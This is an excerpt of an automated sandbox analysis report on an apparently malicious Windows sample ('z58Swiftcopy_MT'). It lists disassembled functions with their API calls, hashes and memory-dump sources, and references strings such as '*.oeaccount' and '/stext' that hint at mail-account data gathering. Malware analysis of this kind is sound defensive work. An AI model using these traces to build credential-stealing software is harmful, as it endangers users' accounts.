                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                                      Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                                      • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                                      Function 00406F30 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`-v,00407A43,00000001,?,00000000,`-v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                                      • String ID: `-v
                                                                                                                                                                                                                                      • API String ID: 3056473165-2394497839
                                                                                                                                                                                                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                                      Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                                      Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408D5C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408D7A
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408D98
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408DA8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                                      Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                      • String ID: Arial
                                                                                                                                                                                                                                      • API String ID: 3853255127-493054409
                                                                                                                                                                                                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                                                                      Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                                      Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 145871493-0
                                                                                                                                                                                                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                                      Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                                      Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                                      Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                                      Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                                      Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                                      Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                                      Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                                      Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                                                                                                                                      Non-executed Functions

